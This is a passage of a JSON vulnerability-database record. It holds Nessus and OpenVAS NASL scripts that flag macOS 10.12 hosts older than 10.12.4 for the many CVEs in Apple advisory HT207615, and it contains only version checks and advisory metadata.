\"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nif (version !~ \"^10\\.12($|[^0-9])\") audit(AUDIT_OS_NOT, \"Mac OS 10.12.x\");\n\nfixed_version = \"10.12.4\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n 
severity:SECURITY_HOLE,\n xss:TRUE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-09-24T15:05:29", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-HT207615", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2423", "CVE-2017-2430", "CVE-2016-7056", "CVE-2016-7936", "CVE-2016-7983", "CVE-2016-9536", "CVE-2017-2486", "CVE-2016-2161", "CVE-2016-7930", "CVE-2017-2461", "CVE-2017-5341", "CVE-2016-10011", "CVE-2017-2450", "CVE-2016-7931", "CVE-2016-7985", "CVE-2016-3619", "CVE-2016-7922", "CVE-2016-10009", "CVE-2016-9540", "CVE-2016-9935", "CVE-2017-2441", "CVE-2017-5484", "CVE-2017-5203", "CVE-2016-8743", "CVE-2017-2431", "CVE-2017-2435", "CVE-2017-2422", "CVE-2016-10010", "CVE-2017-2439", "CVE-2017-2402", "CVE-2016-7928", "CVE-2017-5342", "CVE-2017-2420", "CVE-2017-2379", "CVE-2017-2428", "CVE-2016-7993", "CVE-2017-2437", "CVE-2017-2483", "CVE-2016-7986", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2443", "CVE-2017-2418", "CVE-2017-2381", "CVE-2017-2489", "CVE-2016-9539", "CVE-2016-7935", "CVE-2017-2451", "CVE-2017-5205", "CVE-2017-2406", "CVE-2016-7934", "CVE-2016-4688", "CVE-2016-9535", "CVE-2017-5486", "CVE-2017-2474", "CVE-2016-5636", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2016-7975", "CVE-2016-7937", "CVE-2016-8575", "CVE-2016-7585", "CVE-2017-2388", "CVE-2017-7070", "CVE-2016-9537", "CVE-2016-8574", "CVE-2016-9538", "CVE-2017-2462", "CVE-2017-2487", "CVE-2016-10160", "CVE-2017-5204", "CVE-2016-7926", "CVE-2016-7939", "CVE-2016-7924", "CVE-2017-2449", "CVE-2017-6974", "CVE-2017-2421", "CVE-2017-2427", "CVE-2016-7974", "CVE-2017-5029", 
"CVE-2017-2410", "CVE-2017-2482", "CVE-2017-2477", "CVE-2016-10159", "CVE-2017-2458", "CVE-2016-7992", "CVE-2017-2448", "CVE-2016-10012", "CVE-2017-2401", "CVE-2017-2409", "CVE-2016-7932", "CVE-2016-8740", "CVE-2017-2392", "CVE-2017-2413", "CVE-2017-2408", "CVE-2017-5202", "CVE-2017-2467", "CVE-2016-5387", "CVE-2016-7938", "CVE-2016-7984", "CVE-2017-2490", "CVE-2017-5483", "CVE-2016-9586", "CVE-2017-2407", "CVE-2017-2438", "CVE-2016-7973", "CVE-2017-2426", "CVE-2017-2436", "CVE-2017-2473", "CVE-2016-10161", "CVE-2017-2403", "CVE-2017-2416", "CVE-2017-5482", "CVE-2017-2457", "CVE-2016-7929", "CVE-2016-7940", "CVE-2016-7923", "CVE-2016-7925", "CVE-2016-9533", "CVE-2017-2398", "CVE-2017-2440", "CVE-2016-10158", "CVE-2016-7927", "CVE-2016-0736", "CVE-2017-5485", "CVE-2017-2425", "CVE-2017-2429", "CVE-2017-2432", "CVE-2016-7933", "CVE-2017-2478"], "modified": "2019-09-20T00:00:00", "id": "OPENVAS:1361412562310810728", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810728", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-HT207615\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810728\");\n script_version(\"2019-09-20T11:01:01+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\",\n \"CVE-2016-8743\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10160\",\n \"CVE-2016-10161\", \"CVE-2016-9935\", \"CVE-2017-2421\", \"CVE-2017-2438\",\n \"CVE-2017-2430\", \"CVE-2017-2462\", \"CVE-2017-2420\", \"CVE-2017-2427\",\n \"CVE-2017-2449\", \"CVE-2017-2379\", \"CVE-2017-2417\", \"CVE-2017-2431\",\n \"CVE-2017-2435\", \"CVE-2017-2450\", \"CVE-2017-2461\", \"CVE-2016-9586\",\n \"CVE-2016-7585\", \"CVE-2017-2429\", \"CVE-2017-2487\", \"CVE-2017-2406\",\n \"CVE-2017-2407\", \"CVE-2017-2439\", \"CVE-2017-2428\", \"CVE-2017-2418\",\n \"CVE-2017-2426\", \"CVE-2017-2416\", \"CVE-2017-2467\", \"CVE-2017-2489\",\n \"CVE-2016-3619\", \"CVE-2017-2443\", \"CVE-2017-2408\", \"CVE-2017-2436\",\n \"CVE-2017-2437\", \"CVE-2017-2388\", \"CVE-2017-2398\", \"CVE-2017-2401\",\n \"CVE-2017-2410\", \"CVE-2017-2440\", \"CVE-2017-2456\", \"CVE-2017-2472\",\n \"CVE-2017-2473\", \"CVE-2017-2474\", \"CVE-2017-2478\", \"CVE-2017-2482\",\n \"CVE-2017-2483\", \"CVE-2017-2458\", \"CVE-2017-2448\", \"CVE-2017-2390\",\n \"CVE-2017-2441\", \"CVE-2017-2402\", \"CVE-2017-2392\", \"CVE-2017-2457\",\n \"CVE-2017-2409\", \"CVE-2017-2422\", \"CVE-2016-10009\", \"CVE-2016-10010\",\n \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-7056\", \"CVE-2017-2403\",\n \"CVE-2016-5636\", \"CVE-2017-2413\", \"CVE-2017-2423\", \"CVE-2017-2451\",\n \"CVE-2017-2485\", \"CVE-2017-2425\", \"CVE-2017-2381\", \"CVE-2017-6974\",\n \"CVE-2016-7922\", 
\"CVE-2016-7923\", \"CVE-2016-7924\", \"CVE-2016-7925\",\n \"CVE-2016-7926\", \"CVE-2016-7927\", \"CVE-2016-7928\", \"CVE-2016-7929\",\n \"CVE-2016-7930\", \"CVE-2016-7931\", \"CVE-2016-7932\", \"CVE-2016-7933\",\n \"CVE-2016-7934\", \"CVE-2016-7935\", \"CVE-2016-7936\", \"CVE-2016-7937\",\n \"CVE-2016-7938\", \"CVE-2016-7939\", \"CVE-2016-7940\", \"CVE-2016-7973\",\n \"CVE-2016-7974\", \"CVE-2016-7975\", \"CVE-2016-7983\", \"CVE-2016-7984\",\n \"CVE-2016-7985\", \"CVE-2016-7986\", \"CVE-2016-7992\", \"CVE-2016-7993\",\n \"CVE-2016-8574\", \"CVE-2016-8575\", \"CVE-2017-5202\", \"CVE-2017-5203\",\n \"CVE-2017-5204\", \"CVE-2017-5205\", \"CVE-2017-5341\", \"CVE-2017-5342\",\n \"CVE-2017-5482\", \"CVE-2017-5483\", \"CVE-2017-5484\", \"CVE-2017-5485\",\n \"CVE-2017-5486\", \"CVE-2016-9533\", \"CVE-2016-9535\",\n \"CVE-2016-9536\", \"CVE-2016-9537\", \"CVE-2016-9538\", \"CVE-2016-9539\",\n \"CVE-2016-9540\", \"CVE-2017-2486\", \"CVE-2016-4688\", \"CVE-2017-2432\",\n \"CVE-2017-2490\", \"CVE-2017-7070\", \"CVE-2017-2477\", \"CVE-2017-5029\");\n script_bugtraq_id(95078, 95076, 91816, 94650, 95077, 95764, 95774, 95783, 95768,\n 94846, 97140, 97137, 95019, 97146, 85919, 97147, 97134, 95375,\n 96767, 94968, 94972, 94977, 94975, 91247, 97132, 95852, 94742,\n 94744, 94745, 94746, 94753, 94754, 94747, 97300, 97303);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-20 11:01:01 +0000 (Fri, 20 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 17:37:14 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-HT207615\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple 
flaws exists. For details\n refer the reference links.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, bypass certain protection\n mechanism and have other impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207615\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.3\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.4\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}